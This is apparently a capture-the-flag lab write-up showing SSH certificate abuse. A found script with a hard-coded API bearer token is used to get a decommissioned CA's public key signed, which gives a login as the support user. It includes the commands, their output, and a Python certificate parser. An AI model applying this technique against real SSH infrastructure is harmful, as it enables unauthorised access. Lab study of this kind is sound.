Sign Key API
zzinter@itrc:~$ ll
total 32K
4.0K drwx------ 1 zzinter zzinter 4.0K Aug 5 15:43 .
4.0K -rw-r----- 1 root zzinter 33 Aug 5 15:41 user.txt
0 lrwxrwxrwx 1 root root 9 Jul 23 14:22 .bash_history -> /dev/null
8.0K drwxr-xr-x 1 root root 4.0K Jul 23 14:22 ..
4.0K -rw-r--r-- 1 zzinter zzinter 220 Mar 29 19:40 .bash_logout
4.0K -rw-r--r-- 1 zzinter zzinter 3.5K Mar 29 19:40 .bashrc
4.0K -rw-r--r-- 1 zzinter zzinter 807 Mar 29 19:40 .profile
4.0K -rw-rw-r-- 1 root root 1.2K Feb 19 16:43 sign_key_api.sh
After moving laterally to the zzinter user, a bash script was found in the home directory: sign_key_api.sh. The listing also shows .bash_history symlinked to /dev/null, so no command history is kept for this account.
zzinter@itrc:~$ cat sign_key_api.sh
#!/bin/bash

usage () {
    echo "Usage: $0 <public_key_file> <username> <principal>"
    exit 1
}

if [ "$#" -ne 3 ]; then
    usage
fi

public_key_file="$1"
username="$2"
principal_str="$3"

supported_principals="webserver,analytics,support,security"

IFS=',' read -ra principal <<< "$principal_str"

for word in "${principal[@]}"; do
    if ! echo "$supported_principals" | grep -qw "$word"; then
        echo "Error: '$word' is not a supported principal."
        echo "Choose from:"
        echo "  webserver - external web servers - webadmin user"
        echo "  analytics - analytics team databases - analytics user"
        echo "  support   - IT support server - support user"
        echo "  security  - SOC servers - support user"
        echo
        usage
    fi
done

if [ ! -f "$public_key_file" ]; then
    echo "Error: Public key file '$public_key_file' not found."
    usage
fi

public_key=$(cat $public_key_file)

curl -s signserv.ssg.htb/v1/sign -d '{"pubkey": "'"$public_key"'", "username": "'"$username"'", "principals": "'"$principal"'"}' -H "Content-Type: application/json" -H "Authorization:Bearer 7Tqx6owMLtnt6oeR2ORbWmOPk30z4ZH901kH6UUT6vNziNqGrYgmSve5jCmnPJDE"
The script sends a POST request to the /v1/sign endpoint on the signserv.ssg.htb host
- The API endpoint had been discovered earlier, but could not be used at that point because it requires an Authorization header; the script carries a hard-coded bearer token for exactly this purpose
- The messages found earlier described this script as the tool that signs public keys with the appropriate principal
- The script reads the comma-separated principals into the array principal, but the JSON body expands "$principal", which in bash is only the first element, so a single principal is sent no matter how many are passed
- Another important point is that the server was said to trust both the old and the new CA
- This means the script can be used to have the decommissioned CA's public key signed, yielding a certificate for a key whose private half is already in hand (ca-itrc)
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ scp -o CertificateFile=zzinter-itrc-cert.pub -i ca-itrc ca-itrc zzinter@$IP:~/
ca-itrc 100% 2602 125.8KB/s 00:00
┌──(kali㉿kali)-[~/…/htb/labs/resource/decommission_old_ca]
└─$ scp -o CertificateFile=zzinter-itrc-cert.pub -i ca-itrc ca-itrc.pub zzinter@$IP:~/
ca-itrc.pub 100% 572 7.8KB/s 00:00
The old CA keypair (ca-itrc and ca-itrc.pub) is transferred to the target first, authenticating with the zzinter certificate.
zzinter@itrc:~$ bash ./sign_key_api.sh ca-itrc.pub blah blah
Error: 'blah' is not a supported principal.
Choose from:
webserver - external web servers - webadmin user
analytics - analytics team databases - analytics user
support - IT support server - support user
security - SOC servers - support user
Usage: ./sign_key_api.sh <public_key_file> <username> <principal>
The script takes three arguments. At this point it is known that the old CA's public key can be submitted as the key to be signed. The help text lists four principals mapped to three users: webadmin, analytics and support (both the support and the security principals map to the support user).
zzinter@itrc:~$ bash ./sign_key_api.sh ca-itrc.pub support support > support-support.pub
After many attempts, the only working combination turned out to be the support user with the support principal. The other users known at this point were tried as well, and none of them worked.
The resulting certificate, support-support.pub, together with the old CA's private key, ca-itrc, is used to authenticate to the target system.
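Before authenticating with support-support.pub it is worth checking what the server actually issued: the script redirects curl's output straight into the file, so an API error body would be saved there just the same, and the principals embedded in the certificate, not the string passed on the command line, are what sshd matches against the login name. `ssh-keygen -L -f support-support.pub` prints these fields. The following is an added Python example, not code from the original writeup or from the target, that decodes the same fields from the OpenSSH certificate wire format and applies the identity checks sshd performs for a CA-signed user certificate. The parser handles ed25519 and RSA subject keys; the sample certificate it builds is constructed here with zeroed key material and a placeholder signature so the example runs offline, and the parser deliberately does not verify signatures.

```python
"""Decode an OpenSSH certificate and check which login it actually grants.
Added example (not from the writeup or the target's tooling): it decodes the
fields `ssh-keygen -L` prints but does NOT verify the CA signature. The sample
certificate below is constructed with a placeholder signature to run offline."""
import base64
import struct
import time

SSH_CERT_TYPE_USER = 1

def _read_string(buf, off):
    """SSH 'string': uint32 big-endian length prefix followed by the bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def _read_uint(buf, off, fmt):
    return struct.unpack_from(fmt, buf, off)[0], off + struct.calcsize(fmt)

def _read_strings(blob):
    """A string holding a sequence of strings (principals; option name/data pairs)."""
    out, off = [], 0
    while off < len(blob):
        s, off = _read_string(blob, off)
        out.append(s)
    return out

def is_certificate_line(line):
    """Cheap check that the file holds a *-cert.pub entry, not e.g. an API error body."""
    parts = line.split()
    return len(parts) >= 2 and parts[0].endswith("-cert-v01@openssh.com")

def parse_openssh_cert(line):
    """Parse one *-cert.pub line (ed25519 or RSA subject key) into its fields."""
    if not is_certificate_line(line):
        raise ValueError("not an OpenSSH certificate line")
    cert_type, b64 = line.split()[:2]
    buf = base64.b64decode(b64)
    typ, off = _read_string(buf, 0)
    if typ.decode() != cert_type:
        raise ValueError("type prefix does not match certificate blob")
    _nonce, off = _read_string(buf, off)
    if cert_type == "ssh-ed25519-cert-v01@openssh.com":
        _pk, off = _read_string(buf, off)                # subject public key
    elif cert_type == "ssh-rsa-cert-v01@openssh.com":
        _e, off = _read_string(buf, off)                 # mpint e
        _n, off = _read_string(buf, off)                 # mpint n
    else:
        raise ValueError(f"unsupported certificate type {cert_type}")
    serial, off = _read_uint(buf, off, ">Q")
    ctype, off = _read_uint(buf, off, ">I")
    key_id, off = _read_string(buf, off)
    principals, off = _read_string(buf, off)
    valid_after, off = _read_uint(buf, off, ">Q")
    valid_before, off = _read_uint(buf, off, ">Q")
    critical, off = _read_string(buf, off)
    extensions, off = _read_string(buf, off)
    _reserved, off = _read_string(buf, off)
    sig_key, off = _read_string(buf, off)                # CA public key blob
    _signature, off = _read_string(buf, off)             # not verified here
    if off != len(buf):
        raise ValueError("trailing bytes after signature")
    # Options are (name, data) pairs; only the names are kept here (data at odd indices).
    return {"serial": serial, "is_user_cert": ctype == SSH_CERT_TYPE_USER,
            "key_id": key_id.decode(),
            "principals": [p.decode() for p in _read_strings(principals)],
            "valid_after": valid_after, "valid_before": valid_before,
            "critical_options": sorted(n.decode() for n in _read_strings(critical)[::2]),
            "extensions": sorted(n.decode() for n in _read_strings(extensions)[::2]),
            "ca_key_type": _read_string(sig_key, 0)[0].decode()}

def rejection_reason(cert, login_user, now=None):
    """Why sshd (TrustedUserCAKeys, no AuthorizedPrincipalsFile) would refuse this
    certificate for login_user; None if the identity checks pass."""
    now = int(time.time()) if now is None else now
    if not cert["is_user_cert"]:
        return "not a user certificate"
    if not cert["principals"]:
        return "certificate lacks principal list"
    if login_user not in cert["principals"]:
        return f"{login_user!r} not among principals {cert['principals']}"
    if not cert["valid_after"] <= now < cert["valid_before"]:
        return "outside validity window"
    return None

def _s(b):
    return struct.pack(">I", len(b)) + b

def build_sample_cert(key_id, principals, valid_after, valid_before):
    """Constructed ed25519 user certificate: zeroed key material and a placeholder
    signature, so structurally valid but not cryptographically valid."""
    ctype = b"ssh-ed25519-cert-v01@openssh.com"
    body = (_s(ctype) + _s(bytes(32)) + _s(bytes(32))            # nonce, subject pk
            + struct.pack(">QI", 1, SSH_CERT_TYPE_USER)            # serial, cert type
            + _s(key_id.encode())
            + _s(b"".join(_s(p.encode()) for p in principals))
            + struct.pack(">QQ", valid_after, valid_before)
            + _s(b"")                                              # critical options
            + _s(_s(b"permit-pty") + _s(b"") + _s(b"permit-user-rc") + _s(b""))
            + _s(b"")                                              # reserved
            + _s(_s(b"ssh-ed25519") + _s(bytes(32)))               # CA public key
            + _s(_s(b"ssh-ed25519") + _s(bytes(64))))              # placeholder sig
    return ctype.decode() + " " + base64.b64encode(body).decode() + " sample"

if __name__ == "__main__":
    cert = parse_openssh_cert(build_sample_cert("support", ["support"], 0, 2 ** 40))
    print(cert, rejection_reason(cert, "webadmin") or "accepted", sep="\n")
```

To inspect the real file, pass its first line to parse_openssh_cert (for example `parse_openssh_cert(open("support-support.pub").readline())`) and call rejection_reason with the login name you intend to use; a principals list that does not contain that name explains a rejected login before any SSH attempt. Since the parser does not check the signature, only a successful login proves the certificate was issued by a CA the host trusts.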